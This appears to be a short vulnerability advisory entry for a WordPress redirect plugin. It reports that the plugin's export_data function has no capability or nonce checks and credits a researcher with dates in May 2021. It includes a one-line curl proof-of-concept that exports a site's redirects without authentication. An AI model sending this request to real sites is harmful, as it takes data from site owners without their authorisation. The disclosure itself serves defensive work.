The export_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to export a site's redirects.
curl -X POST --url "[URL]/wp-admin/admin-post.php?page=301options&export=true"
Chloe Chamberland
Chloe Chamberland
Yes
2021-05-26 (about 1 years ago)
2021-05-26 (about 1 years ago)
2021-05-27 (about 1 years ago)